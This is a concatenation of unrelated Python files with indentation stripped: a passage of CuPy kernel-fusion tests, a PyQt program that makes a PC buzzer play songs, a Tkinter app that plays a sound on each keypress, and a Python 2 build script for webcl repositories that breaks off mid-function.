def test_fuse8(self, xp, dtype):
a = xp.array([2, 2, 2, 2, 3, 3, 3, 3], dtype=dtype)
b = xp.array([2, 2, 3, 3, 2, 2, 3, 3], dtype=dtype)
c = xp.array([2, 3, 2, 3, 2, 3, 2, 3], dtype=dtype)
def toi(x):
return xp.where(x, 1, 0)
@cupy.fuse()
def g(p, q, r):
x = toi(2 == p) + toi(2 != q) + toi(3 > r)
y = toi(2 < p) + toi(2 >= q) + toi(3 <= r)
return x + y << 3
return g(a, b, c)
@testing.for_all_dtypes(no_bool=True, no_complex=True)
@testing.numpy_cupy_array_equal()
def test_fuse9(self, xp, dtype):
a = xp.array([2, 2, 2, 2, 3, 3, 3, 3], dtype=dtype)
b = xp.array([2, 2, 3, 3, 2, 2, 3, 3], dtype=dtype)
c = xp.array([2, 3, 2, 3, 2, 3, 2, 3], dtype=dtype)
@cupy.fuse()
def g(x, y, z):
x *= y
x += y
x = x / y
z %= y
x += y + z
g(a, b, c)
return a
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_array_equal()
def test_fuse10(self, xp, dtype):
a = xp.array([2, 2, 2, 2, 3, 3, 3, 3], dtype=dtype)
b = xp.array([2, 2, 3, 3, 2, 2, 3, 3], dtype=dtype)
c = xp.array([2, 3, 2, 3, 2, 3, 2, 3], dtype=dtype)
@cupy.fuse()
def g(x, y, z):
a = x
a += y
xp.add(x, y, z)
g(a, b, c)
return c
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_array_equal()
def test_fuse11(self, xp, dtype):
a = xp.array([2, 2, 2, 2, 3, 3, 3, 3], dtype=dtype)
b = xp.array([2, 2, 3, 3, 2, 2, 3, 3], dtype=dtype)
c = xp.array([2, 3, 2, 3, 2, 3, 2, 3], dtype=dtype)
@cupy.fuse()
def g(x, y, z):
a = x
a += y
xp.add(x, y, z)
return y
res = g(a, b, c)
return c + res
# NumPy 1.9 accepts itruediv between integers
@testing.with_requires('numpy>=1.10')
@unittest.skipUnless(six.PY3, 'Only for py3')
@testing.for_int_dtypes()
@testing.numpy_cupy_raises()
def test_fuse_int_itruediv_py3_raises(self, xp, dtype):
a = xp.array(3, dtype=dtype)
b = xp.array(2, dtype=dtype)
@cupy.fuse()
def g(x, y):
x /= y
g(a, b)
@testing.for_all_dtypes(no_bool=True)
@testing.numpy_cupy_array_equal()
def test_different_type_same_ufunc(self, xp, dtype):
a = xp.array([2, 2, 2, 2, 3, 3, 3, 3], dtype=dtype)
b = xp.array([2, 2, 3, 3, 2, 2, 3, 3], dtype=numpy.int32)
c = xp.array([2, 3, 2, 3, 2, 3, 2, 3], dtype=numpy.float32)
@cupy.fuse()
def g(x, y, z):
return (x + y, y + z, z + x)
s, t, u = g(a, b, c)
return s
@unittest.skipUnless(six.PY2, 'Only for py2')
@testing.for_int_dtypes(no_bool=True)
@testing.numpy_cupy_array_equal()
def test_fuse_int_ifloordiv_py2(self, xp, dtype):
a = xp.array(3, dtype=dtype)
b = xp.array(2, dtype=dtype)
@cupy.fuse()
def g(x, y):
x /= y
g(a, b)
return a
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_array_equal()
def test_reduce1(self, xp, dtype):
a = xp.array([[2, 2, 2, 2], [3, 3, 3, 3]], dtype=dtype)
b = xp.array([[2, 2, 3, 3], [2, 2, 3, 3]], dtype=dtype)
c = xp.array([[2, 3, 2, 3], [2, 3, 2, 3]], dtype=dtype)
@cupy.fuse()
def g(x, y, z):
return xp.sum(x * y + z)
return g(a, b, c)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_array_equal()
def test_reduce2(self, xp, dtype):
a = xp.array([[2, 2, 2, 2], [3, 3, 3, 3]], dtype=dtype)
b = xp.array([[2, 2, 3, 3], [2, 2, 3, 3]], dtype=dtype)
c = xp.array([[2, 3, 2, 3], [2, 3, 2, 3]], dtype=dtype)
@cupy.fuse()
def g(x, y, z):
return xp.sum(x * y + z, axis=0)
return g(a, b, c)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_array_equal()
def test_reduce3(self, xp, dtype):
a = xp.array([[2, 2, 2, 2], [3, 3, 3, 3]], dtype=dtype)
b = xp.array([[2, 2, 3, 3], [2, 2, 3, 3]], dtype=dtype)
c = xp.array([[2, 3, 2, 3], [2, 3, 2, 3]], dtype=dtype)
@cupy.fuse()
def g(x, y, z):
return xp.sum(x * y + z, axis=1)
return g(a, b, c)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_array_equal()
def test_reduce4(self, xp, dtype):
a = xp.array([[2, 2, 2, 2], [3, 3, 3, 3]], dtype=dtype)
@cupy.fuse()
def g(x):
return xp.prod(x)
return g(a)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_array_equal()
def test_reduce5(self, xp, dtype):
a = xp.array([[2, 2, 2, 2], [3, 3, 3, 3]], dtype=dtype)
@cupy.fuse()
def g(x):
return xp.max(x, axis=0)
return g(a)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_array_equal()
def test_reduce6(self, xp, dtype):
a = xp.array([[2, 2, 2, 2], [3, 3, 3, 3]], dtype=dtype)
@cupy.fuse()
def g(x):
return xp.min(x, axis=0)
return g(a)
@testing.gpu
class TestFusionDecorator(unittest.TestCase):
@testing.numpy_cupy_array_equal()
def test_without_paren(self, xp):
@cupy.fuse
def func_wo_paren(x):
"""Fuse without parentheses"""
return x + x
self.assertEqual(func_wo_paren.__name__, 'func_wo_paren')
self.assertEqual(func_wo_paren.__doc__, 'Fuse without parentheses')
a = xp.array([1])
return func_wo_paren(a)
@testing.numpy_cupy_array_equal()
def test_with_paren(self, xp):
@cupy.fuse()
def func_w_paren(x):
"""Fuse with parentheses"""
return x + x
self.assertEqual(func_w_paren.__name__, 'func_w_paren')
self.assertEqual(func_w_paren.__doc__, 'Fuse with parentheses')
a = xp.array([1])
return func_w_paren(a)
@testing.gpu
class TestFusionKernelName(unittest.TestCase):
def check(self, xp, func, expected_name, is_elementwise):
a = xp.arange(0, 12, dtype='d').reshape(3, 4)
b = xp.arange(5, 17, dtype='d').reshape(3, 4)
c = xp.arange(13, 25, dtype='d').reshape(3, 4)
# Test kernel name (with mock)
if xp is cupy:
target = (
'cupy.core.core.ElementwiseKernel' if is_elementwise
else 'cupy.core.core.ReductionKernel')
with mock.patch(target) as Kernel:
func(a, b, c)
Kernel.assert_called_once()
self.assertEqual(Kernel.call_args[1]['name'], expected_name)
# Test there's no error in computation (without mock)
return func(a, b, c)
@testing.numpy_cupy_allclose(atol=1e-5)
def test_elementwise(self, xp):
def func(a, b, c):
@cupy.fuse()
def func_a1(x, y, z):
return (x + y) * z
return func_a1(a, b, c)
return self.check(xp, func, 'func_a1', True)
@testing.numpy_cupy_allclose(atol=1e-5)
def test_elementwise_with_name(self, xp):
def func(a, b, c):
@cupy.fuse(kernel_name='abc')
def func_a1(x, y, z):
return (x + y) * z
return func_a1(a, b, c)
return self.check(xp, func, 'abc', True)
@testing.numpy_cupy_allclose(atol=1e-5)
def test_reduction_premap(self, xp):
def func(a, b, c):
@cupy.fuse()
def func_a1(x, y, z):
return xp.sum((x + y) * z)
return func_a1(a, b, c)
return self.check(xp, func, 'func_a1', False)
@testing.numpy_cupy_allclose(atol=1e-5)
def test_reduction_postmap(self, xp):
def func(a, b, c):
@cupy.fuse()
def func_a1(x):
return xp.sqrt(xp.sum(x) + 10)
return func_a1(a)
return self.check(xp, func, 'func_a1', False)
@testing.numpy_cupy_allclose(atol=1e-5)
def test_reduction_01(self, xp):
def func(a, b, c):
@cupy.fuse()
def func_a1(x, y, z):
return xp.sqrt(xp.prod(x + y * z, axis=1) + 10)
return func_a1(a, b, c)
return self.check(xp, func, 'func_a1', False)
@testing.numpy_cupy_allclose(atol=1e-5)
def test_reduction_with_name(self, xp):
def func(a, b, c):
@cupy.fuse(kernel_name='abc')
def func_a1(x, y, z):
return xp.sum((x + y) * z)
return func_a1(a, b, c)
return self.check(xp, func, 'abc', False)
@testing.gpu
class TestFusionPythonConstant(unittest.TestCase):
@testing.for_all_dtypes_combination(names=['dtype1', 'dtype2'])
@testing.numpy_cupy_array_equal()
def test_python_scalar(self, xp, dtype1, dtype2):
@cupy.fuse()
def f(x):
return x * numpy.asscalar(dtype2(1))
return f(testing.shaped_arange((1,), xp, dtype1))
@testing.for_all_dtypes_combination(names=['dtype1', 'dtype2'])
@testing.numpy_cupy_array_equal()
def test_numpy_scalar(self, xp, dtype1, dtype2):
@cupy.fuse()
def f(x):
return x * dtype2(1)
return f(testing.shaped_arange((1,), xp, dtype1))
@testing.gpu
class TestFusionReturnsConstantValue(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_array_equal()
def test_pass(self, xp, dtype):
@cupy.fuse()
def f(x):
pass
x = testing.shaped_arange((3, 3), xp, dtype)
y = f(x)
self.assertEqual(y, None)
return x
@testing.for_all_dtypes(no_bool=True)
@testing.numpy_cupy_array_equal()
def test_no_retval(self, xp, dtype):
@cupy.fuse()
def f(x):
x += 1
x = testing.shaped_arange((3, 3), xp, dtype)
y = f(x)
self.assertEqual(y, None)
return x
@testing.gpu
class TestFusionReturnsTuple(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_array_list_equal()
def test_empty_tuple(self, xp, dtype):
@cupy.fuse()
def f(x):
return ()
x = testing.shaped_arange((3, 4), xp, dtype)
y = f(x)
self.assertEqual(type(y), tuple)
return y
@testing.for_all_dtypes()
@testing.numpy_cupy_array_list_equal()
def test_singleton_tuple(self, xp, dtype):
@cupy.fuse()
def f(x):
return x * 2,
x = testing.shaped_arange((3, 4), xp, dtype)
y = f(x)
self.assertEqual(type(y), tuple)
return y
@testing.for_all_dtypes()
@testing.numpy_cupy_array_list_equal()
def test_pair_tuple(self, xp, dtype):
@cupy.fuse()
def f(x):
return x * 2, x * 3
x = testing.shaped_arange((3, 4), xp, dtype)
y = f(x)
self.assertEqual(type(y), tuple)
return y
class TestFusionComposition(unittest.TestCase):
@testing.for_all_dtypes(no_bool=True)
@testing.numpy_cupy_array_equal()
def test_composition(self, xp, dtype):
@cupy.fuse()
def f(x, y):
return x - y * 2, x + y
@cupy.fuse()
def g(x, y, z):
a, b = f(x + z, z - x * 3)
c, d = f(x - y, y - z)
return a + b * c - d
@cupy.fuse()
def h(x, y):
a, b = f(x + y * 2, y * 3)
return a - b * g(x - 2, x - 3, -y)
x = testing.shaped_arange((3, 3), xp, dtype)
y = testing.shaped_arange((3, 3), xp, dtype)
return h(x, y)
class TestFusionCompile(unittest.TestCase):
@testing.for_all_dtypes(no_bool=True)
@testing.numpy_cupy_array_equal()
def test_compile_from_dtypes(self, xp, dtype):
@cupy.fuse()
def f(x, y):
return x - y * 2
x = testing.shaped_arange((3, 3), xp, dtype)
y = testing.shaped_arange((3, 3), xp, dtype)
f._compile_from_dtypes(x.dtype, y.dtype)
return f(x, y)
@testing.for_all_dtypes(no_bool=True)
@testing.numpy_cupy_array_equal()
def test_clear_cache(self, xp, dtype):
@cupy.fuse()
def f(x, y):
return x - y * 2
x = testing.shaped_arange((3, 3), xp, dtype)
y = testing.shaped_arange((3, 3), xp, dtype)
f.clear_cache()
return f(x, y)
@testing.gpu
class TestFusionGetArrayModule(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_array_equal()
def test_get_array_module(self, xp, dtype):
@cupy.fuse()
def f(x):
xp = cupy.get_array_module(x)
return xp.square(x)
x = testing.shaped_arange((3, 4), xp, dtype)
return f(x)
class TestFusionThread(unittest.TestCase):
def test_thread(self):
x = testing.shaped_arange((3, 3), cupy, cupy.int64)
y = testing.shaped_arange((3, 3), cupy, cupy.int64)
out = [None]
@cupy.fuse()
def f(x, y):
return x + y * 2
def _target(x, y):
cupy.cuda.Device(0).use()
out[0] = f(x, y)
t = threading.Thread(target=_target, args=(x, y))
t.daemon = True
t.start()
t.join()
assert (out[0] == f(x, y)).all()
@testing.numpy_cupy_array_equal()
def test_thread_multiple_dtypes(self, xp):
x1 = testing.shaped_arange((3, 3), xp, xp.int64)
y1 = testing.shaped_arange((3, 3), xp, xp.int64)
x2 = x1.astype(xp.float64)
y2 = y1.astype(xp.float64)
threads = [None] * 100
out = [None] * 100
@cupy.fuse()
def f(x, y):
return x + y * 2
def _target(tid, x, y):
if xp is cupy:
xp.cuda.Device(0).use()
out[tid] = f(x, y).astype(xp.int64)
def run_thread(tid):
x, y = (x1, y1) if tid % 2 == 0 else (x2, y2)
t = threading.Thread(target=_target, args=(tid, x, y))
threads[tid] = t
t.daemon = True
t.start()
for tid in six.moves.range(0, 50):
run_thread(tid)
for tid in six.moves.range(0, 50):
threads[tid].join()
for tid in six.moves.range(50, 100):
run_thread(tid)
for tid in six.moves.range(50, 100):
threads[tid].join()
return xp.concatenate(out)
@testing.gpu
class TestBroadcast(unittest.TestCase):
@testing.numpy_cupy_array_equal()
def test_broadcast(self, xp):
@cupy.fuse()
def f(x, y):
x += y
return x
x = testing.shaped_arange((2, 3, 4), xp, xp.int64)
y = testing.shaped_arange((3, 4), xp, xp.int64)
return f(x, y)
@testing.numpy_cupy_raises()
def test_broadcast_datarace(self, xp):
@cupy.fuse()
def f(x, y):
x += y
return x
x = testing.shaped_arange((3, 4), xp, xp.int64)
y = testing.shaped_arange((2, 3, 4), xp, xp.int64)
return f(x, y)
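# The tests above all exercise the same pattern: decorate an elementwise
# (or reduction-terminated) function with cupy.fuse() and check that the
# fused kernel matches the unfused result. A minimal standalone sketch of
# that pattern, assuming a working CuPy installation, looks like this:
#
#     import cupy
#
#     @cupy.fuse()
#     def squared_diff(x, y):
#         return (x - y) * (x - y)
#
#     x = cupy.arange(6, dtype=cupy.float32)
#     y = cupy.ones(6, dtype=cupy.float32)
#     out = squared_diff(x, y)   # runs as a single fused elementwise kernel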
|
computersinger.py
|
'''
Function:
Make the computer motherboard's buzzer hum a song
Author:
Car
WeChat official account:
Car的皮皮
'''
import os
import sys
import time
import threading
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
'''Make the computer motherboard's buzzer hum a song'''
class ComputerSinger(QWidget):
tool_name = '让电脑主板上的蜂鸣器哼歌'
def __init__(self, parent=None, title='让电脑主板上的蜂鸣器哼歌 —— Car的皮皮', **kwargs):
super(ComputerSinger, self).__init__(parent)
import ctypes
rootdir = os.path.split(os.path.abspath(__file__))[0]
self.rootdir = rootdir
self.setFixedSize(500, 100)
self.setWindowTitle(title)
self.setWindowIcon(QIcon(os.path.join(rootdir, 'resources/icon.ico')))
self.grid = QGridLayout()
# Define the required widgets
# --label
self.musicfilepath_label = QLabel('音乐简谱路径:')
# --line edit
self.musicfilepath_edit = QLineEdit(
os.path.join(rootdir, 'resources/musicfiles/小幸运')
)
# --buttons
self.choose_button = QPushButton('选择')
self.play_button = QPushButton('播放')
# Layout
self.grid.addWidget(self.musicfilepath_label, 0, 0, 1, 1)
self.grid.addWidget(self.musicfilepath_edit, 0, 1, 1, 4)
self.grid.addWidget(self.choose_button, 1, 3, 1, 1)
self.grid.addWidget(self.play_button, 1, 4, 1, 1)
self.setLayout(self.grid)
# Event bindings
self.choose_button.clicked.connect(self.openfile)
self.play_button.clicked.connect(
lambda _: threading.Thread(target=self.play).start()
)
# Some constants
self.pitchs_dict = {'l': 0.5, 'm': 1.0, 'h': 2.0}
self.tone2freq_dict = {
'C': 523,
'D': 587,
'E': 659,
'F': 698,
'G': 784,
'A': 880,
'B': 988,
}
self.tone_scale = 1.06
self.beats = 1000 * 60 / 65
self.beep_player = ctypes.windll.kernel32
'''Open a file'''
def openfile(self):
filepath = QFileDialog.getOpenFileName(self, '请选取音乐简谱', self.rootdir)
self.musicfilepath_edit.setText(filepath[0])
'''Parse the numbered musical notation (jianpu) file'''
def parse(self, filepath):
song_info = open(filepath, 'r').read().replace('\n', '').split(',')
tone = song_info[0]
song_info = song_info[1:]
return tone, song_info
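# Score file format assumed by parse()/play() (inferred from the code; no
# sample file is shown here): the whole file is one comma-separated string.
# The first field is the key ('C'..'B'); every following field is
# "<degree><register><beats>", where <degree> indexes the notes list built
# in play() (0 = one-beat rest), <register> is 'l'/'m'/'h', and <beats> is
# a float beat count, e.g.:
#     C,1m1,2m0.5,3m0.5,5h1,0,6l2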
'''Play'''
def play(self):
filepath = self.musicfilepath_edit.text()
if not os.path.isfile(filepath):
return
tone, song_info = self.parse(filepath)
do = self.tone2freq_dict[tone]
re = int(do * self.tone_scale * self.tone_scale)
mi = int(re * self.tone_scale * self.tone_scale)
fa = int(mi * self.tone_scale * self.tone_scale)
sol = int(fa * self.tone_scale * self.tone_scale)
la = int(sol * self.tone_scale * self.tone_scale)
si = int(la * self.tone_scale * self.tone_scale)
notes = [0, do, re, mi, fa, sol, la, si]
for item in song_info:
if notes[int(item[0])] == 0:
time.sleep(self.beats / 1000)
else:
self.beep_player.Beep(
int(notes[int(item[0])] * self.pitchs_dict[item[1]]),
int(self.beats * float(item[2:])),
)
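# Worked example of the pitch math above: with tone 'C', do = 523 Hz and
# each successive note is scaled by tone_scale**2 (1.06**2, roughly a whole
# tone), giving re=587, mi=659, fa=740, sol=831, la=933, si=1048 after the
# int() truncation. fa and si therefore sit above the tempered values in
# tone2freq_dict, since the code stacks whole tones only. One beat lasts
# 1000 * 60 / 65 ~= 923 ms.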
|
main.py
|
from tkinter import Tk,Button,Label,Frame,filedialog,ttk,DoubleVar,PhotoImage,RIGHT,LEFT
from keyboard import on_release,wait
from pygame import mixer
from threading import Thread
mixer.init()
tune = mixer.Sound("sound1.mp3")
vol = 1.0
w = Tk()
w.title("Mechvibe v-1.1.2")
track = 0
vibe_vol_value = DoubleVar()
music_vol_value = DoubleVar()
music_vol_value.set(1.0)
vibe_vol_value.set(1.0)
iplay = PhotoImage(file="play.png")
ipause = PhotoImage(file="pause.png")
def vibe_vol_change(e):
mixer.Channel(0).set_volume(vibe_vol_value.get())
def music_vol_change(e):
mixer.Channel(1).set_volume(music_vol_value.get()*0.3)
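# Channel 0 carries the per-keystroke "vibe" sound and channel 1 the looping
# background track; the music slider is scaled by 0.3 so the track stays
# quieter than the key sounds.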
def tune_():
global tune
def note(a):
mixer.Channel(0).play(tune)
on_release(callback = note)
wait()
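# on_release() installs a global keyboard hook that plays the current tune
# on every key release, and wait() (called with no hotkey) blocks this
# worker thread indefinitely so the hook stays alive while the Tk mainloop
# runs in the main thread.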
def strt():
x = Thread(target=tune_)
x.daemon = True
x.start()
start.grid_forget()
stop.grid(row=1,column=1)
def track_select():
global track
play_.pack_forget()
pause_.pack()
track = mixer.Sound(filedialog.askopenfile(title="select the tune",filetypes=(("mp3 files(bgms recommended)","*.mp3"),)))
mixer.Channel(1).play(track,-1)
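# (loops=-1 repeats the selected background track indefinitely on channel 1)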
def music_play():
global track
if track:
play_.pack_forget()
pause_.pack()
mixer.Channel(1).unpause()
def music_pause():
pause_.pack_forget()
play_.pack()
mixer.Channel(1).pause()
def sound1():
global tune
tune= mixer.Sound("sound1.mp3")
mixer.Channel(0).play(tune)
def sound2():
global tune
tune= mixer.Sound("sound2.mp3")
mixer.Channel(0).play(tune)
def sound3():
global tune
tune= mixer.Sound("sound3.mp3")
mixer.Channel(0).play(tune)
def sound4():
global tune
tune= mixer.Sound("sound4.mp3")
mixer.Channel(0).play(tune)
def custom():
global tune
tune = mixer.Sound(filedialog.askopenfile(title="select the tune",filetypes=(("mp3 files(1 sec recommended)","*.mp3"),)))
#Frames
f4 = Frame(w)
f0 = Frame(f4)
f1 = Frame(f0)
f2 = Frame(f0)
f3 = Frame(f4)
f5 = Frame(w)
f6 = Frame(f5)
f7 = Frame(f5)
#Labels
l1 = Label(w,text="Feel the vibe",font="impact 36 bold")
l2 = Label(f0,text="Vibe")
l3 = Label(f3,text="Vol",width=5)
l4 = Label(f7,text="Music")
l5 = Label(f6,text="Vol",width=5)
#Buttons
b1 = Button(f1,text="tune 1",command = sound1,bd=4,)
b2 = Button(f1,text="tune 2",command= sound2,bd=4)
b3 = Button(f2,text="tune 3",command= sound3,bd=4)
b4 = Button(f2,text="tune 4",command= sound4,bd=4)
b5 = Button(f0,text="add tune",command= custom,bd=4)
b6 = Button(f7,text="browse",command=track_select,bd=4)
play_ = Button(f7,image=iplay,borderwidth=0,command=music_play)
pause_ = Button(f7,image=ipause,borderwidth=0,command=music_pause)
start = Button(w,text="START.",font=" impact 20 bold",bg="pale green",command=strt,bd=4)
stop = Button(w,text="STOP",bg="red",font=" impact 20 bold",bd=4,command=lambda: w.destroy())
#Slider
vibeVol = ttk.Scale(f3,from_=1,to=0,orient='vertical',command=vibe_vol_change,variable=vibe_vol_value)
musicVol = ttk.Scale(f6,from_=1,to=0,orient='vertical',command=music_vol_change,variable=music_vol_value)
#layout
l1.grid(row=0,column=1)
l2.pack()
l3.pack(pady=3)
l4.pack()
l5.pack(pady=3)
f0.grid(row=0,column=1)
f1.pack()
f2.pack()
f3.grid(row=0,column=0)
f4.grid(row=1,column=0)
f5.grid(row=1,column=2)
f6.pack(side=RIGHT)
f7.pack(side=LEFT)
musicVol.pack()
b1.pack(side=LEFT)
b2.pack(side=RIGHT)
b3.pack(side=LEFT)
b4.pack(side=RIGHT)
b5.pack()
b6.pack()
play_.pack()
start.grid(row=1,column=1)
vibeVol.pack()
w.iconbitmap("icon.ico")
w.minsize(400,250)
w.resizable(False,False)
w.mainloop()
|
automator.py
|
#!/usr/bin/python
#
# automator.py
# Licence : https://github.com/wolfviking0/webcl-translator/blob/master/LICENSE
#
# Created by Anthony Liot.
# Copyright (c) 2013 Anthony Liot. All rights reserved.
#
import commands
import subprocess
import os
import sys
import multiprocessing
import time
from optparse import OptionParser
from functools import wraps
from time import gmtime, strftime
THREAD = False
PROF_DATA = {}
def profile(fn):
@wraps(fn)
def with_profiling(*args, **kwargs):
start_time = time.time()
ret = fn(*args, **kwargs)
elapsed_time = time.time() - start_time
if fn.__name__ not in PROF_DATA:
PROF_DATA[fn.__name__] = [0, []]
PROF_DATA[fn.__name__][0] += 1
PROF_DATA[fn.__name__][1].append(elapsed_time)
return ret
return with_profiling
def print_prof_data():
for fname, data in PROF_DATA.items():
max_time = max(data[1])
avg_time = sum(data[1]) / len(data[1])
s, mi = divmod(max_time*1000, 1000)
m, s = divmod(s, 60)
h, m = divmod(m, 60)
smax = '%02d:%02d,%03d' % (m,s,mi)
s, mi = divmod(avg_time*1000, 1000)
m, s = divmod(s, 60)
h, m = divmod(m, 60)
savg = '%02d:%02d,%03d' % (m,s,mi)
print "Function '%s' called %d times" % (fname, data[0]),
print 'Execution time max: %s, average: %s' % (smax, savg)
def clear_prof_data():
global PROF_DATA
PROF_DATA = {}
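# Typical use of the profiling helpers above (illustrative sketch; 'crunch'
# is just a stand-in, the real script decorates update/clean/build/copy/
# launch below):
#
#     @profile
#     def crunch():
#         time.sleep(0.1)
#
#     crunch(); crunch()
#     print_prof_data()   # -> "Function 'crunch' called 2 times ..."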
list_repositories=["webcl-translator/webcl","webcl-cuda-nvidia","webcl-ocl-nvidia","webcl-osx-sample","webcl-ocltoys","webcl-davibu","webcl-book-samples","webcl-box2d","boost","freeimage"]
page_subfolder=["build_trans","build_cuda","build_nvidia","build_osx","build_toys","build_davibu","build_book","build_box"]
# Go up one folder
os.chdir("../")
# Grab the root folder
root_repositories = os.getcwd() + "/"
# Grab the website folder
page_repositories=os.getcwd() + "/webcl-translator-website/"
def worker_update(online,local,option):
"""thread worker_update function"""
directory = root_repositories + local
print "\tFunction worker 'update' ... "+str(directory)
if os.path.isdir(directory):
pr = subprocess.Popen( "/usr/bin/git reset --hard" , cwd = os.path.dirname( root_repositories + local + "/"), shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE )
(out, error) = pr.communicate()
pr = subprocess.Popen( "/usr/bin/git pull" , cwd = os.path.dirname( root_repositories + local + "/"), shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE )
(out, error) = pr.communicate()
else:
pr = subprocess.Popen( "/usr/bin/git clone https://github.com/wolfviking0/"+str(online)+".git "+ option + " " + local, cwd = os.path.dirname( root_repositories ), shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE )
(out, error) = pr.communicate()
return
@profile
def update(repo_list):
print "\nFunction 'update' ... "+str(repo_list)
jobs = []
for i in repo_list:
#if i.find("webcl-translator/webcl") != -1:
# var = raw_input("\tDo you want force update on the webcl-translator repository ? [y]es / [n]o\n").strip()
# if (var.find("y") == -1):
# continue
p = multiprocessing.Process(target=worker_update, args=(i,i,""))
jobs.append(p)
p.start()
# WebSite
p = multiprocessing.Process(target=worker_update, args=("webcl-translator","webcl-website","-b gh-pages"))
jobs.append(p)
p.start()
for j in jobs:
j.join()
def worker_clean(repo,param):
"""thread worker_clean function"""
directory = root_repositories + repo
print "\tFunction worker 'clean' ... "+str(directory)
if os.path.isdir(directory):
pr = subprocess.Popen( "make clean"+param , cwd = os.path.dirname( root_repositories + repo + "/"), shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE )
(out, error) = pr.communicate()
else:
print "/!\ '",directory,"' doesn't exist, call with -u / --update options"
return
@profile
def clean(repo_list,param):
print "\nFunction 'clean' ... "+str(repo_list)
jobs = []
for i in repo_list:
p = multiprocessing.Process(target=worker_clean, args=(i,param,))
jobs.append(p)
p.start()
# Clean folder website
for folder in page_subfolder:
directory = page_repositories + folder
if os.path.isdir(directory):
pr = subprocess.Popen( "rm "+directory+"/*" , cwd = os.path.dirname( root_repositories ), shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE )
(out, error) = pr.communicate()
else:
print "/!\ Website repo %s doesn't exist ..." % (folder)
for j in jobs:
j.join()
def worker_build(repo,param,id):
"""thread worker_build function"""
directory = root_repositories + repo
print "\tFunction worker 'build' ... "+str(directory)
if os.path.isdir(directory):
pr = subprocess.Popen( "make all_"+str(id)+param , cwd = os.path.dirname( root_repositories + repo + "/"), shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE )
(out, error) = pr.communicate()
else:
print "/!\ '",directory,"' doesn't exist, call with -u / --update options"
return
@profile
def build(repo_list,param):
print "\nFunction 'build "+param+"' ... "+str(repo_list)
if THREAD == False:
for i in repo_list:
print "\tFunction no thread 'build' ... "+str(root_repositories + i)
pr = subprocess.Popen( "make"+param , cwd = os.path.dirname( root_repositories + i + "/"), shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE )
(out, error) = pr.communicate()
else:
jobs = []
for i in repo_list:
for j in range(1,4):
p = multiprocessing.Process(target=worker_build, args=(i,param,j,))
jobs.append(p)
p.start()
for j in jobs:
j.join()
def worker_copy(folder,repo):
"""thread worker_copy function"""
directory = page_repositories + folder
print "\tFunction worker 'copy' ... "+str(directory)
if not os.path.exists(directory):
os.mkdir(directory)
if os.path.isdir(directory):
pr = subprocess.Popen( "cp -rf "+root_repositories + repo + "/js/ "+directory+"/" , cwd = os.path.dirname( root_repositories ), shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE )
(out, error) = pr.communicate()
# Update index.html file
f = open(directory+'/index.html','r')
string = ""
while 1:
line = f.readline()
if not line:break
string += line
f.close()
start = string.find('<footer><center>')
end = string.find('</center></footer>')
footer = '<footer><center>webcl-translator is maintained by <a href="https://github.com/wolfviking0">Anthony Liot</a>.<br/>Last update : '+strftime("%Y-%m-%d %H:%M:%S", gmtime())
string = string[:start] + footer + string[end:]
f = open(directory+'/index.html','w')
f.write(string)
f.close()
else:
print "/!\ Website repo %s doesn't exist ..." % (folder)
return
@profile
def copy(repo_list):
print "\nFunction 'copy' ... "+str(repo_list)
jobs = []
for repo in repo_list:
index = list_repositories.index(repo)
folder = page_subfolder[index]
p = multiprocessing.Process(target=worker_copy, args=(folder,repo))
jobs.append(p)
p.start()
for j in jobs:
j.join()
# Update index.html file
f = open(page_repositories+'/index.html','r')
string = ""
while 1:
line = f.readline()
if not line:break
string += line
f.close()
start = string.find('<footer><center>')
end = string.find('</center></footer>')
footer = '<footer><center>webcl-translator is maintained by <a href="https://github.com/wolfviking0">Anthony Liot</a>.<br/>Last update : '+strftime("%Y-%m-%d %H:%M:%S", gmtime())
string = string[:start] + footer + string[end:]
f = open(page_repositories+'/index.html','w')
f.write(string)
f.close()
#pr = subprocess.Popen( "ln -Fs "+page_repositories+"index.html "+root_repositories+"webcl-samples.html", cwd = os.path.dirname( root_repositories ), shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE )
#(out, error) = pr.communicate()
@profile
def launch(parser,options):
global THREAD
THREAD = options.thread
# Multi process
cores = multiprocessing.cpu_count()
# Keep one core free for the system
cores -= 1
# First, check how many options are enabled
num_opt_enabled = 0
for item in options.__dict__:
if options.__dict__[item]:
num_opt_enabled+=1
if (options.thread):
num_opt_enabled-=1
if (options.original):
num_opt_enabled-=1
if (options.debug):
num_opt_enabled-=1
if (options.fastcomp):
num_opt_enabled-=1
if (options.native):
num_opt_enabled-=1
if (len(options.repo) > 0):
num_opt_enabled-=1
# Parameters for the makefile
param = ""
if options.fastcomp:
param += " FAST=1 " # Default value inside makefile
else:
param += " FAST=0 "
if options.debug:
param += " DEB=1 "
else:
param += " DEB=0 " # Default value inside makefile
if options.original:
param += " ORIG=1 "
else:
param += " ORIG=0 " # Default value inside makefile
if ( not ( ( all(repo.isdigit() for repo in options.repo) ) and all( ( int(repo) >= 0 and int(repo) <= 6 ) for repo in options.repo) ) ) :
print "/!\ You must use --repo with integer between 0 & 6"
parser.print_help()
exit(-1)
# \todo Need to add the possibility
# Check Error case
if (options.all and num_opt_enabled != 1):
print "/!\ You must use --all alone or with --repo and/or --debug options"
parser.print_help()
exit(-1)
repolist = []
if (len(options.repo) > 0):
for repo in options.repo:
repolist.append(str(list_repositories[int(repo)]))
else:
# Skip the last two repositories (boost, freeimage) by default
